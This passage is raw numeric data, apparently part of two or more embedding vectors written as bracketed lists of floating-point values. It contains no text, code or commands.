00028165686,0.03561366,0.004399554,0.0032145472,0.011126623,-0.010040856,-0.011339374,-0.016059086,-0.010736183,-0.008705318,0.017962806,-0.01675489,-0.0019674618,-0.014967496,-0.0064835334,-0.017508306,-0.008910257,0.021270182,0.022510845,-0.022560297,-0.0035947296,0.0020201574,0.0027237453,-0.0053632604,-0.0031493308,0.020739933,-0.009106201,-0.027735135,0.008668863,0.0026819073,0.0010347544,0.0036738329,-0.013551883,-0.0016087934,-0.01591165,-0.0035457388,-0.0016199864,0.00354089,-0.021819597,-0.011707435,-0.007891303,-0.015201578,-0.0015221951,0.018112144,0.022595484,0.009979102,0.0049717044,0.0017459926,-0.0029292305,0.005321682,-0.017280575,0.022950683,0.018984005,0.0001994939,-0.015712362,0.0010176502,-0.010042858,-0.012534086,-0.004911679,0.00627733,0.009916758,-0.0015683619,0.021821594,0.003422076,0.027645452,0.0071683116,0.0036957269,0.009779279,0.019571608,0.03441003,-0.03483724,0.006047412,0.0053988956,0.0010648057,0.00092475774,0.016709425,0.010464035,-0.0047485577,0.0005707135,-0.018479556,0.024414528,0.0022268519,-0.0076922905,-0.0009862625,0.021786427,-0.008899013,-0.00068821124,0.005451033,0.017703205,0.004950606,-0.0154379355,-0.002594923,-0.0043332595,0.013436448,0.0029336477,-0.00026588122,0.006433622,0.032312147,0.010162875,0.012193123,-0.017054295,0.02030302,-0.017007947,-0.02595737,0.010598445,0.018753326,0.014692183,-0.035141133,0.0052501145,0.022247167,0.0040899934,-0.017873779,-0.014638637,-0.009301351,-0.005765151,0.024867086,0.0020606348,0.011441528,-0.008253427,0.0053532664,0.03087735,-0.009009178,-0.040266305,-0.024187375,0.017742664,-0.0075600455,0.025262864,-0.007746018,-0.010166822,0.008172215,0.024016773,0.010022692,0.0068830275,0.011364909,-0.019160168,0.005311355,-0.0096208,-0.0027627298,0.009291194,0.014783771,-0.0043050824,0.005278224,-0.009973722,-0.008377791,-0.020454612,0.0072740554,0.007889534,-0.0070352233,0.0037870023,-0.010422029,-0.013644857,0.016469473,-0.0068049952,-0.0049868515,-0.0038625458,-0.011768067,-0.0034444488,-0.028297367,-0.0036624563,-0.008015836,0.024398485,0.013017381,-0.0007425142,-0.022692086,-0.014621609,-0.015811596,0.021131247,0.018110339,-0.0054336004,0.009238835,0.017136965,0.014779701,-0.010235621,0.045910127,0.017179217,0.0019134495,0.01473484,0.019186454,-0.021348638,-0.002809525,0.027592672,-0.014260835,-0.019533383,0.011831941,-0.013817568,0.0135174235,0.02335638,0.01566692,-0.01581568,0.021447316,0.02530354,0.0007240141,-0.013485023,-0.012246937,0.034343146,0.00046470403,-0.01156456,0.026472133,0.023387276,-0.0029049288,-0.014935641,0.008912979,-0.013573772,0.0005374226,0.016978618,-0.0112808235,-0.0073188525,-0.009156029,-0.0417646,-0.02546766,0.0044909813,0.0051744725,0.023634514,-0.019816097,0.006884226,-0.009120285,0.0036071872,0.018588072,-0.016108695,-0.0016697987,0.0013439091,-0.06432894,-0.0031245244,-0.012061415,0.0076890225,-0.004387039,0.028614141,0.02709818,-0.0066665486,0.028664565,-0.006492193,-0.017728753,-0.014091551,-0.007865167,-0.022599166,0.010662756,-0.0025813617,-0.03150669,0.008384678,-0.0029690703,-0.008484386,-0.013556968,0.003719191,0.0012861738,-0.01828276,0.026143655,-0.055151936,-0.007579998,0.021874387,0.010721708,-0.0043438715,-0.008894678,-0.013232841,-0.027870929,-0.017023006,-0.017580966,-0.0072067766,0.017206678,-0.006272663,0.0047611846,-0.01489478,0.012631259,-0.041895423,-0.020512812,-0.005329208,-0.07769418,-0.008458797,0.011987999,0.023811607,0.0135412505,-0.014931306,0.0013751283,-0.015980577,0.027791213,0.016442746,-0.008255483,-0.01200825,0.0039146757,-0.008533709,0.034140065,-0.011654138,-0.006129463,0.0015368221,-0.010769453,-0.004156942,0.0007624298,-0.014184186,-0.020226832,-0.0064549055,0.0088993125,-0.028020758,-0.0098517025,-0.01648931,0.011125431,-0.010275952,-0.008925906,0.007471647,0.0095411725,-0.0056937207,0.0019819257,-0.0006448425,-0.02925274,0.024545807,-0.029407967,-0.011962757,0.00937597,0.020036047,0.0024398614,0.00692946,-0.019360684,0.010575587,-0.02502576,-0.0036884884,-0.007931488,-0.0031470847,0.0021494555,0.024178457,-0.021969834,0.0058213375,0.012148581,0.011595774,0.00067718537,-0.015749296,0.0430561,0.008893615,-0.0017370845,-0.020928156,0.01044082,0.02002511,-0.0048092073,-0.002193994,0.014716838,0.022456143,0.004066711,0.0082655195,0.014143473,-0.0052026734,-0.0151435705,-0.026528126,-0.0036253263,0.0070523834,0.020112697,-0.00836678,-0.031791434,0.012383543,0.042191014,-0.0009607759,0.02167114,0.018942585,0.0037086683,-0.0046444177,-0.028094733,-0.006499471,0.023861831,0.011342012,-0.04296787,0.010087712,0.012491012,0.012658204,0.009138151,0.008922509,-0.012088411,0.014662141,0.018284647,-0.0011933635,0.007815493,0.0014789172,0.00316788,-0.016504506,-0.03396032,-0.009157598,-0.01267127,-0.010969841,0.004178925,-0.017732222,-0.009893433,0.014095617,0.0031866159,0.036933687,-0.008958525,0.012259784,-0.008171114,0.04456419,-0.00083689135,-0.012531908,-0.010280975,0.00035084438,-0.017536523,0.032142363,0.014481535,0.0070174523,0.006603408,-0.001934617,-0.0155850435,-0.0056619444,-0.013577124,0.013002483,0.023423078,0.010625224,-0.009524658,0.011938397,-0.02161535,0.015910668,-0.0039594835,0.019931935,0.0022941034,-0.010998534,-0.002697703,0.01201681,-0.019403828,-0.00305839,-0.0072808987,0.0035394982,0.00816648,0.0066914777,0.0011829137,0.020052278,-0.012674933,-0.00061644317,0.027570905,-0.007056952,0.00825624,-0.005890844,-0.017323382,-0.006863228,0.0013357294,0.016633062,0.015462633,-0.030437585,-0.040576298,0.01868924,-0.002420587,0.0016865998,-0.009558585,-0.010369364,-0.0072695613,-0.0149150435,0.007907173,-0.008467805,-0.026692636,-0.030700406,0.0026458565,0.00021151153,0.0071586515,0.02484804,-0.0142337335,-0.017805599,0.007540526,-0.011520824,-0.0031685045,-0.013362049,0.0067522316,0.0027518412,0.0003868387,-0.004199056,-0.009036377,0.009745552,-0.022553334,-0.026695667,-0.0064517874,-0.0019302338,0.015238022,-0.009843043,0.011992052,0.013802957,-0.00013354587,0.008181136,-0.011780398,-0.0020489364,0.044829573,0.016482573,0.0007012877,0.014423644,-0.022096502,0.010744251,-0.023804128,0.0051116226,0.019409664,0.084410824,-0.0021197682,-0.011221131,-0.017757736,0.008643613,-0.010894639,-0.0022237862,0.0019437578,0.01281662,0.00026000288,0.00096777716,-0.011621048,0.0036191647,-0.0022133407,0.0052032075,0.02145912,0.0031395257,-0.010268668,0.010054787,-0.019787708,0.0034710302,-0.02169399,0.0037728734,-0.017317547,0.0023616797,-0.027732123,0.021575972,0.004937246,0.002713208,0.017059349,0.004198507,0.0030664618,0.0040479978,0.023446677,-0.008698638,0.004056639,0.038242295,-0.005974618,0.0022174257,-0.0071283565,-0.0020919477,0.011409807,-0.012171573,-0.0016168001,-0.023151085,-0.022126533,0.004214072,0.011481012,-0.011324127,0.0015094627,-0.01894696,0.0017522834,0.0013690531,-0.008737348,0.004862412,-0.013806247,-0.00038443683,0.02451083,0.0022121528,-0.013850098,0.019003222,-0.00031900714,-0.000019885401,-0.011211777,0.010126345,0.012855139,-0.007135716,0.00797641,-0.021574995,-0.02343139,0.025945384,-0.020253653,0.0030879623,0.006992737,-0.012229541,0.014928761,-0.00981623,0.012951993,0.011736915,-0.009123046,-0.005376836,-0.012969946,0.0053872624,0.0038985026,0.003007851,0.03552007,-0.014420024,0.008095478,-0.00885863,-0.027224487,-0.017142404,0.019110447,0.02730387,-0.00057500764,0.013290642,0.015825488,0.0013973732,0.0035628607,-0.0057642483,-0.036845103,-0.030611703,-0.012542935,0.007563732,-0.010868353,0.006377694,-0.0057801222,-0.020197578,0.008870619,-0.017315986,-0.0039687096,-0.0028089138,0.029499665,0.000121154,0.018282285,-0.016536457,0.03918258,-0.045226682,-0.01025094,0.015707586,-0.023867657,-0.0010981369,0.017702192,0.0024244038,0.02369203,0.011932894,0.0042050937,-0.025422662,0.015687948,-0.01906941,0.01061014,0.006095728,-0.028359711,-0.001693733,0.007207227,-0.0056998893,-0.022964621,0.011915052,0.008764766,0.022699153,0.0025455663,0.014517092,-0.019919401,-0.006186404,-0.0028626248,0.002787856,-0.010786837,0.011821082,-0.023359377,0.012957326,0.0081877345,-0.008907594,0.0112788575,-0.012818876,0.0043309703,-0.03143048,-0.005020221,0.01366967,0.021213772,0.012446321,-0.011809888,0.027294839,-0.019708617,-0.0010141926,-0.0436242,0.022746809,0.0098808305,0.0017774001,0.007499136,0.005527304,-0.011903839,-0.023166483,0.0031717566,0.0016053071,0.010689093,-0.012555983,0.023371417,0.024557753,0.020220276,-0.0117523605,0.002666669,0.003083712,0.0040604565,-0.016367124,-0.01351939,0.027210336,0.005731403,-0.005014201,0.013903508,-0.00407924,0.03942882,-0.011911321,0.00087925885,-0.0019912233,0.0014981247,-0.016264506,0.0025508986,-0.038976416,0.056450862,-0.026246522,-0.034865156,0.009492174,0.0062530953,0.0010051371,-0.026931243,-0.01376967,-0.008574267,-0.004044608,-0.005680512,0.010717942,0.0043377965,0.016705804,-0.0018094594,0.011083369,-0.033961277,-0.005102658,0.004688458,0.018546505,-0.015294887,-0.004450087,-0.024939341,-0.007248069,0.037501365,-0.008843451,0.00069316576,0.004448461,-0.004270734,-0.0033901539,0.009651921,0.011419694,-0.03364434,-0.025412312,0.018634753,0.017605525,0.009521423,-0.014211626,0.009998158,0.0155412685,0.017380588,0.007644057,-0.00858555,-0.008652913,-0.009447423,0.005273519,-0.0029223263,-0.015605423,-0.004316086,-0.013984997,0.0035872702,0.014250135,-0.026087435,-0.024730707,-0.014957974,-0.011267818,-0.010336982,-0.037064962,-0.01935455,0.0066709607,0.025952786,-0.005095921,-0.0028794336,0.020516468,0.012231395,-0.009670379,0.031800598,0.0011800193,-0.028487863,0.010268983,-0.008079086,0.0069935955,-0.0044988077,0.0067977463,0.013278224,-0.012071555,-0.0034287374,0.034024935,0.010965229,0.0063468493,0.0025995073,0.009773785,-0.017611997,0.0050514657,-0.027929544,-0.019229405,-0.029124228,-0.0073028347,0.0048904894,0.001437475,0.014951422,0.029050218,-0.04371005,-0.013409693,0.010063259,-0.0087045645,-0.048078004,0.0070704664,0.005710262,-0.028817227,0.011708228,0.014665721,-0.0051980275,0.012176381,-0.036129,0.0066916696,0.007904048,0.019481212,-0.023945436,0.01473544,0.0016343229,-0.014588452,0.030411506,-0.00688609,0.0002283701,-0.0035369801,-0.008776844,-0.009603934,-0.021386452,0.020922624,0.020878375,0.0024142517,0.0017467715,0.027543249,0.00068276067,0.00217345,0.017917667,-0.007820535,-0.010229191,0.0010199342,-0.036408942,-0.010568731,-0.0013644949,-0.0010848208,0.016641643,0.01751874,-0.029426452,-0.0072397185,0.012863672,-0.014110301,0.09485678,-0.011273805,0.0022801247,-0.0046264194,0.006242685,-0.0017933073,0.018038439,0.025404604,0.0148971,-0.0023704069,0.0065072444,0.017477965,0.028069198,0.017444355,-0.01935774,-0.010044332,-0.00087251415,0.088264234,-0.021351976,0.032154173,0.0004633281,-0.008247574,-0.008749753,0.0109164,0.0038437133,-0.06941326,-0.00035890684,-0.035969254,0.0166401,0.0022479487,-0.016855203,-0.007177726,-0.006921376,0.026915366,-0.0142821,0.015975501,0.011402352,-0.0074069477,-0.036236938,-0.008272843,0.013222378,0.0053870887,-0.0083019165,-0.011206619,-0.018463466,0.029356353,-0.027597522,0.016456831,-0.020423312,0.022033973,-0.0010215949,-0.0006542315,0.014214176,-0.0042431145,-0.0036218853,-0.0148032755,0.018671775,0.005631825,0.00015679414,0.02085109,0.018437095,0.009324733,-0.008036187,0.01724203,-0.011190327,0.0075417412,-0.021245703,-0.016587071,-0.0075444696,-0.0012104667,0.006573027,0.03123885,-0.02048642,-0.0012601587,0.032835346,-0.02084816,-0.013363048,-0.009069832,0.0049031777,0.004308838,0.027102847,0.009502345,-0.0040189647,-0.0049734535,0.040592868,0.028682023,-0.0025221754,0.01352399,0.017312631,-0.023913153,0.00742476,0.00225754,-0.0049996716,-0.016130876,0.015562656,0.01485595,0.004350632,-0.025189292,0.012459848,-0.032932203,0.004848832,0.04509298,-0.01457507,0.007563551,-0.018705225,0.013686996,-0.03523792,-0.018906668,0.00074441504,-0.005261107,-0.009736077,-0.0006707593,-0.009348004,0.011197471,-0.010092578,-0.0142500345,-0.0047329185,0.009607067,-0.04712808,-0.0011428035,0.02297094,0.0044731842,-0.0017714445,-0.0007400889,-0.020636287,-0.0012748472,0.005548886,0.0051973327,-0.016036406,-0.0064714183,-0.02110268,-0.015711661,-0.015811402,0.02298674,0.019555753,-0.025010232,0.030718155,-0.043472942,-0.04465939,-0.015383169,0.0016851241,-0.011709171,0.00011799211,0.00033895724,-0.01801045,-0.0015701677,-0.0026580335,0.0029278784],[-0.0008603195,0.029800417,-0.0042914776,0.013110767,-0.00006242893,-0.00562413,-0.016589519,-0.0045643207,0.0014380444,-0.004525574,0.009562644,0.00078344333,-0.008760528,0.01789566,0.004601833,-0.014148202,0.004783587,-0.0069408775,0.0016763316,0.0070022405,0.016890673,-0.005381992,0.01740783,-0.01777772,0.013429315,0.0020384907,-0.012831809,0.021328451,-0.014412786,0.0117159635,-0.026683649,0.025929412,0.005410574,-0.007171491,-0.019354964,-0.012881376,-0.004125024,-0.009306125,0.023231426,-0.009643313,-0.005752442,0.017565815,0.009410307,0.01879289,-0.026957754,0.016901495,0.0022961206,0.007978568,-0.03344118,0.0064536803,0.008737023,-0.024135454,-0.033895113,0.010205262,-0.0116193285,0.0013324462,0.016457498,-0.034212388,0.016031286,-0.019256722,0.00059723965,0.039000463,-0.015393408,-0.018870333,-0.024821473,-0.017870108,-0.0067738956,0.00030729503,-0.0068554454,-0.02693198,-0.006589867,-0.01062296,0.0056677028,0.0101415245,0.0025062843,0.039180145,0.014915722,-0.013567589,-0.026904488,0.018679937,-0.0025778904,0.022778748,0.005825687,-0.01070446,-0.0033859964,0.0067208386,-0.013818119,-0.0017876232,-0.023342853,-0.0636796,-0.00492739,0.0065290416,-0.021288218,0.018384902,-0.024392014,0.006882594,0.016426528,-0.01673596,0.00934259,-0.00085851905,-0.020803452,-0.011997917,-0.030307058,0.0014189024,-0.0027036252,-0.009627022,-0.025799116,-0.008752144,-0.0047960207,-0.022239609,0.0037615383,0.0054924693,0.018447112,0.027809381,0.008131998,-0.0012852949,-0.0052914615,0.013883744,-0.008468376,0.000985824,-0.0010664333,0.018112235,0.027723351,0.009604159,0.019415423,0.007048069,-0.03062312,-0.0045179115,-0.0039404607,-0.003470284,-0.024906814,-0.022113541,-0.00041466748,-0.017677477,-0.01931514,-0.008351802,-0.0027025496,-0.0027260405,0.01007284,-0.014192947,0.0048161293,0.0029177344,-0.0051324866,-0.005306439,-0.007977657,0.016586928,-0.014088771,0.016445844,0.020245787,-0.0035204808,-0.016513355,0.0073635248,-0.0011591597,-0.010967881,-0.020676438,0.01580563,0.010658078,-0.0019237954,-0.025418298,0.020884937,-0.01806508,0.021528635,0.030696932,-0.011339524,-0.017782664,-0.02694221,0.012861958,-0.0005666285,-0.0075988644,0.0062749772,0.014117184,0.016287686,0.0074601434,0.01970612,0.034646872,0.010715901,-0.0034537003,-0.0026402012,-0.0025271047,-0.0050482918,0.00026445932,-0.017173005,0.01748099,0.000066812485,0.0017170035,0.0062885867,0.010174911,-0.016650854,-0.015598087,-0.008421896,-0.026315423,-0.011706316,0.011861245,-0.0016287257,-0.0057134996,0.0058769635,-0.007315536,0.078311324,0.01785342,-0.0021404931,-0.00033542138,0.005819086,-0.004527223,-0.013469957,-0.011125027,0.0015826111,0.00556137,-0.003998163,-0.015669243,0.01234847,0.0045254566,0.0055983737,0.00139718,0.02890538,0.027591104,-0.05135324,0.0064343982,-0.010188298,0.015276556,-0.0035495649,0.0035071177,0.0019438058,0.016235417,-0.02551259,-0.01739806,-0.03435726,0.014836094,-0.0013377455,0.007389523,-0.024076678,-0.0026316214,-0.0024606197,0.007853298,-0.0069666402,-0.0044005336,-0.014688621,-0.0025047082,-0.0026758465,0.00010360655,0.005988168,0.008980004,-0.0028051825,0.050102048,0.029513251,-0.000006663477,-0.011227357,0.00793891,0.02428123,0.008921371,0.0024201544,0.024809912,0.009349176,0.01158942,0.0062199268,-0.0045527346,-0.0074166134,0.010151203,-0.03427349,0.00085024326,0.0017598188,0.020218838,0.01262913,-0.0069503877,0.0036698163,0.026515687,0.004304651,0.011890328,-0.016840704,-0.0045466386,-0.03166403,-0.018114112,-0.010437138,-0.01900352,-0.0075982646,0.016007766,0.01183458,0.013871344,0.0024238457,0.0070404033,-0.014445967,0.0033301078,-0.009243935,-0.0038646813,0.014276361,0.012226219,0.009518798,-0.0066777277,-0.015191353,0.033634517,-0.00050541456,0.0073714554,0.014017542,0.010359312,0.024290519,-0.01968663,0.003940678,0.0008706606,0.0002477964,0.010642437,-0.0077819685,0.025012169,-0.018781055,0.034124024,0.014622415,-0.009980386,-0.011620806,0.0092949895,0.04324043,-0.023568388,-0.0031766593,-0.02790347,-0.013855863,-0.01830756,-0.036986947,0.005716763,0.005721671,0.005654709,-0.006792624,0.00083016173,0.008738329,0.0294954,-0.02047795,0.011288207,-0.01499115,-0.007813378,0.0031321526,0.023226336,0.013512645,-0.00041316732,0.0021511777,-0.0022963276,-0.024060687,0.020462856,0.008515768,-0.009239431,0.027720654,-0.00043882086,0.014752908,0.008028037,-0.008360008,-0.016624007,-0.0010283012,0.0069808783,0.012083558,0.012461008,-0.029878173,-0.010607971,0.01462631,0.012920285,0.016308477,0.0002553218,0.015136364,-0.016060943,-0.0051184455,-0.0020161201,0.021872293,-0.016230615,-0.013849713,-0.0009622892,-0.01473238,0.012674393,-0.018317254,-0.01456229,0.030687101,0.030185677,0.0037578952,-0.0005932377,0.008356885,-0.018006723,-0.01459339,0.010187183,0.009393487,0.019989453,-0.012087835,-0.0134148,-0.024060836,0.0096803075,0.0095754685,-0.005408097,0.02358151,-0.021003928,-0.024243172,-0.026779164,-0.020168621,0.016405387,0.0059023085,-0.009334734,0.019691966,-0.0021324325,0.006025631,-0.015518855,-0.0019165159,0.00068370183,-0.022319475,-0.0022157107,-0.0039372966,-0.011403925,-0.009891324,-0.037770953,0.014419811,0.0035809472,0.0061203893,-0.010908673,-0.00998046,0.0055793333,0.03409875,0.026667746,-0.028697992,-0.015313553,0.018715141,-0.0029750078,0.0009481293,-0.0056681023,-0.0028697718,-0.005584009,0.03157168,-0.014844937,0.017686112,0.0032396226,0.016120713,0.023206271,-0.031514384,0.008185032,0.02660365,0.007655895,0.010385722,-0.0059710825,-0.006647015,-0.008460772,0.016007246,-0.0048458646,-0.020323204,-0.00052077475,-0.021761118,-0.0013713969,-0.008331786,-0.011650052,0.0009729608,0.000051764204,0.009785297,0.022630468,0.0101052765,-0.0023919276,0.018791005,-0.01301531,0.002132456,-0.001805785,0.0061664036,0.029667228,-0.0052851536,0.020069804,0.019446943,0.028050177,-0.014283626,-0.0020020863,0.015178572,-0.0002089867,-0.020291924,0.034188382,0.0126928715,0.022230845,0.008196579,-0.002656292,0.0003717006,0.004689232,-0.030776553,-0.013406424,-0.0072954833,0.002996594,-0.009197903,0.010084569,-0.015301603,-0.008163339,0.024754284,-0.023902882,0.0062041404,-0.0011829736,-0.015256112,-0.000009618501,-0.029229095,-0.0023946704,0.0022250433,0.00032145184,-0.01596161,0.016925795,0.017328888,0.006138043,-0.009158267,0.0024514212,0.020642465,0.00369286,-0.016615437,0.0018831152,0.022244325,0.0041517126,-0.00092033594,0.013383459,-0.02830472,-0.003658514,-0.0070191585,-0.024552448,-0.015860451,0.009198132,0.012825969,0.015864033,0.020593539,0.030122455,0.0021615776,0.01548109,0.024300875,0.05028945,-0.005795313,-0.028621046,-0.011678425,-0.01152083,0.015978107,-0.021518478,-0.0022153815,-0.0073275305,0.024377188,0.018363547,-0.003021644,-0.008750476,0.028027354,0.01235213,-0.0356807,-0.01701966,0.007390779,-0.0017225709,0.0341855,0.026097026,0.02745504,0.0031655002,-0.012587812,-0.005487317,-0.0022807554,0.0005554827,-0.00478144,0.010468058,-0.016059266,0.00085601036,-0.005197477,0.025146779,0.012562309,0.024343157,-0.02219555,0.0023057587,0.006049373,-0.009173504,-0.004811945,-0.008815463,0.023487594,-0.01783767,-0.0057665724,-0.035241246,0.0033272745,0.016180445,0.013530079,-0.014809163,-0.026226405,-0.0072508315,-0.0057990258,-0.004036922,0.012550777,0.00065633655,0.020047572,-0.003909933,-0.015216335,-0.016992198,0.004097415,0.0077168616,0.00811817,-0.006033215,0.008521552,-0.0056842533,-0.008755705,0.0022187815,0.015333579,0.01339657,0.031702563,0.0020992267,0.00087434874,0.041577585,-0.0004680194,0.03182781,-0.018817468,0.013112003,0.010559314,-0.0007120903,-0.032534644,0.011725564,-0.016599465,0.0038805418,-0.018694958,-0.031753425,-0.014824939,0.0074620456,0.0018096315,0.010337685,-0.010290934,-0.044898957,-0.0076555116,0.00095976895,-0.025017973,-0.0026684594,-0.0050916155,-0.0007448463,-0.029426463,0.013138596,0.003163527,-0.013377788,0.0189175,0.0020211886,-0.012693822,-0.019934393,0.0058159283,0.018643627,0.011453956,-0.003164199,0.015019858,0.0047616055,-0.014259053,0.000265715,-0.025862152,0.018465744,0.0060246154,0.003909299,-0.00022318192,-0.032312553,0.0064875646,0.011320158,-0.023995563,0.00075338414,-0.018365357,0.0038209846,-0.008579741,-0.029780788,0.025147166,-0.006029135,0.006759325,-0.0005286362,0.0069959206,-0.07876452,-0.025334196,0.009658739,0.013558715,0.01635794,0.0359327,0.027431503,-0.005119891,-0.0052508283,-0.006668321,0.009272099,0.005813634,0.00868336,-0.010959483,0.00014222061,-0.02789223,-0.018439436,-0.013361694,-0.020416288,0.011086297,-0.011082817,0.03095182,0.009507689,-0.011371988,0.0011561547,-0.0045264014,-0.010253329,-0.007812408,-0.024943078,-0.011450569,0.0040316465,-0.01852566,-0.00089975976,0.02097012,-0.01985671,-0.008898964,-0.0045032846,-0.012424231,-0.010459501,0.01732565,-0.00872554,-0.02095091,0.0075254627,0.0287127,-0.011423446,0.03889426,-0.022393504,0.0041495953,0.01789312,0.032126583,-0.013813533,0.021117324,0.0115947,0.0024122866,-0.025065837,0.016882015,0.025408262,0.01919795,0.007336906,0.0055883788,-0.00033590864,0.0119627165,0.016415786,-0.031836245,0.0046153255,0.015261555,0.025043257,-0.0014908384,0.014800982,0.0029866076,0.02814625,0.0098312935,0.032630395,0.001342246,0.016764916,0.01197745,0.034135427,-0.001132958,0.0036910598,0.014111428,-0.012544123,-0.024518201,-0.019186342,0.021769067,-0.0073591378,0.012990667,-0.008777551,0.00036141512,0.027734704,0.01909544,-0.005486513,-0.015560604,0.011201132,-0.005566792,0.0015354975,-0.025596885,-0.002447741,-0.025662528,-0.0050494843,0.0037766388,0.0042709317,-0.013538611,-0.0041601765,0.005328989,0.012140196,0.02191428,-0.014191408,-0.03401654,-0.008245548,0.008766351,0.020560568,-0.019886658,0.01710321,0.00766734,-0.009377185,0.021443745,-0.019989144,-0.02416564,-0.01929169,-0.009745669,0.011142499,0.02345594,0.001912479,0.012123681,-0.015741993,0.011675334,-0.0037764118,0.0023125636,0.00022427752,-0.011269535,0.0041995947,-0.010055311,-0.01537365,-0.012190508,-0.0038134546,0.008823005,-0.0003221789,-0.023577388,-0.0046473485,-0.009498024,0.02989291,0.00013377397,0.013573307,-0.022729173,0.021587938,0.021054601,-0.0015003374,0.012228159,-0.016981578,0.011899247,0.009227751,0.031013494,0.011787027,-0.025055509,0.00095718977,-0.008154813,-0.0018691326,0.0006654049,-0.011957929,-0.01073969,-0.019244341,-0.015714528,0.009611677,-0.039190665,0.007974979,0.006431213,-0.0009659476,0.031712446,-0.01380101,0.015524772,0.011610183,0.0038496533,0.024196545,-0.019962315,-0.009971529,-0.03530911,-0.029462578,0.024115207,-0.042332795,0.050087452,0.02441151,-0.05189048,-0.010872285,-0.0201377,0.00006959253,-0.017031807,-0.0008176302,0.004918313,0.0045515476,-0.02524877,0.022063058,-0.00010602223,0.018683884,-0.029747775,-0.021597456,0.014830943,0.0061206683,0.026087673,-0.0029581173,-0.012958955,0.0014134888,0.018749801,-0.013070009,0.017042264,-0.007656161,-0.0043567126,-0.0066099158,0.01608442,-0.016761154,0.012005013,0.03525336,-0.010019704,-0.0042399378,0.013904699,0.006603009,0.0062652235,-0.0076062703,-0.023589432,-0.032272622,-0.0037961174,0.0074908426,-0.020751778,0.03013716,0.014578096,0.0103021255,0.0036744573,0.00868647,0.0440666,-0.008501932,0.018210944,0.014481895,-0.004408735,-0.026746044,-0.0041842503,0.00026595587,-0.0012828695,-0.0043413476,-0.0035179954,-0.0058161207,0.027413497,0.018816132,0.0046594366,-0.0055126566,0.007556933,0.0028782936,-0.0037007243,0.014354429,0.0042753546,-0.023029288,-0.0025812513,0.008660486,-0.025810452,-0.011169124,-0.0052851033,-0.009859673,0.028891623,-0.010159983,0.0030060357,0.0059908708,0.011248827,0.007500766,-0.015261383,0.017736027,0.010615166,0.0030758637,-0.0032224192,-0.00643893,0.010491999,0.0018994048,-0.023053514,0.0063284743,-0.0026468905,-0.000917439,0.023298657,0.0053284103,-0.0131851835,0.008150374,-0.0012892056,0.014071504,-0.014288355,0.008570547,0.00019700218,0.028392948,-0.0032963064,-0.0092935115,0.0042601363,-0.02375729,0.0062951264,0.00026110723,-0.003129465,-0.02345261,-0.000026302694,0.022125002,-0.005881382,-0.016883919,0.009560077,-0.057426937,-0.0022863676,-0.017781803,-0.029878112,0.026766745,0.019835968,0.010205764,-0.01672023,0.025201581,-0.013190301,-0.0013920619,-0.008650221,0.012350966,0.0009324722,-0.0030751806,-0.013129636,-0.012126331,0.0049030096,-0.0033391009,0.011274829,-0.04428841,-0.011632943,0.007712534,-0.02284288,0.031744245,0.018831465,-0.015737958,0.011916334,-0.019884812,-0.006547286,-0.0013747318,-0.00042779252,-0.007639188,0.0052498486,-0.025450645,0.0025008826,0.010136628,-0.012156434,0.0060221585,-0.00004625282,-0.0123793725,-0.017543787,-0.0011531337,0.027491989,0.003567942,0.011987379,0.004559972,-0.0019367643,0.0031742563,-0.016655836,0.022669956,0.0017494184,-0.0014061118,-0.0021309287,-0.03074866,0.025607778,-0.020187398,0.021708965,0.010000525,0.04088554,0.009847442,0.0033139875,0.028063772,-0.006199718,-0.02238486,-0.019050943,-0.026626008,0.026753355,0.0007185247,-0.00003999326,-0.0018703383,-0.0022022333,0.015826793,-0.015398593,-0.02474045,0.03457867,-0.0035821935,-0.023559637,0.0058397693,-0.016193863,0.0005397709,0.015215869,-0.02274592,0.0036309876,-0.026577353,-0.0053404816,-0.0081027895,0.026880715,0.006713266,0.017778108,-0.015411963,0.00414767,0.021531975,0.01657348,-0.0010021108,0.027768683,0.017323237,0.009069581,-0.026817067,0.0023048706,0.005438583,0.011111055,-0.017619928,0.06057241,-0.009012363,0.0011833354,0.016799862,0.030068481,0.034194645,0.016425373,-0.02348649,-0.0037269702,-0.0029255205,0.015987664,-0.0016257147,0.008925266,-0.010668084,0.017399842,0.0038198174,0.001805104,0.02003485,-0.034195356,0.022926494,0.002750114,0.004776241,0.0075270305,0.006084667,0.0153345615,-0.008675652,-0.028675966,0.00025266162,0.03005723,-0.023602668,-0.019240262,0.021059843,0.0016786916,0.008428075,-0.04260362,-0.012898379,0.00042521668,-0.021848734,0.0076840357,-0.00017701983,0.028271982,0.015403169,0.010614703,0.0061079133,-0.010681229,0.018824514,0.003998051,0.009031779,-0.021505259,-0.010108091,0.02120748,0.0083530815,0.020088654,0.005799448,-0.0074649705,-0.0009285614,0.012214487,-0.00041018848,-0.01208419,0.011467733,-0.005143624,-0.017601918,-0.01404225,0.0017024066,-0.030119522,-0.0028862276,-0.009668234,-0.0014070082,0.0024989652,-0.013553332,0.022060255,0.0024428295,-0.029204225,0.028955651,0.005761625,-0.018902777,0.026546078,0.019648895,0.00006113721,0.009568149,0.018543506,0.017795196,-0.037121322,-0.026168615,-0.017983211,-0.0059505836,-0.030779256,-0.025425088,-0.008655817,0.011102576,-0.012131562,-0.014249861,0.04559195,-0.00017234418,0.025152288,-0.008399402,-0.0039743255,-0.0055464413,0.029859656,-0.013876399,-0.0042899367,-0.0055084033,0.01929726,0.021399936,-0.025417414,-0.03253925,-0.012835815,-0.021195227,0.0077785077,-0.003486274,-0.0011884224,-0.003276992,0.007054593,-0.018137535,0.00015028859,-0.0073111886,-0.03136915,0.01829162,0.021022296,-0.0059646186,0.017087875,0.005178664,-0.013036095,0.010015981,0.025064051,-0.002017037,-0.025411112,0.032380268,-0.0105966125,0.018730696,0.02026928,-0.023347717,0.0032790953,0.017105298,0.0010857884,-0.021759655,0.02439809,-0.0019809378,-0.016236559,-0.0020583116,-0.039813176,-0.008332458,0.016004201,-0.006813144,-0.028292984,0.009900538,0.018121326,0.017146263,0.003167159,0.012213545,-0.01181452,-0.014931605,-0.02003165,-0.005413029,-0.019946873,-0.0026881136,-0.023682266,-0.007833503,-0.0056975572,-0.0029121693,-0.013468084,-0.029814228,0.0033923157,0.009446905,0.0051338733,0.043023136,-0.017535904,0.0060900976,-0.007098684,-0.009269275,0.014618299,-0.011920666,0.014706128,-0.013614421,-0.015082149,0.001012136,0.0035845772,0.0010350861,-0.01755691,-0.01168047,-0.009494769,0.021181144,0.021189997,-0.0026149002,-0.004888286,0.026724704,0.01996118,-0.018725298,-0.029927466,-0.0026038636,0.012396905,0.030729365,0.017113777,0.0014054022,-0.018920513,-0.021166822,-0.025711251,0.0920258,-0.022732522,0.001808736,0.004462239,0.027520593,-0.022103248,0.027226128,0.015061207,-0.0023854345,0.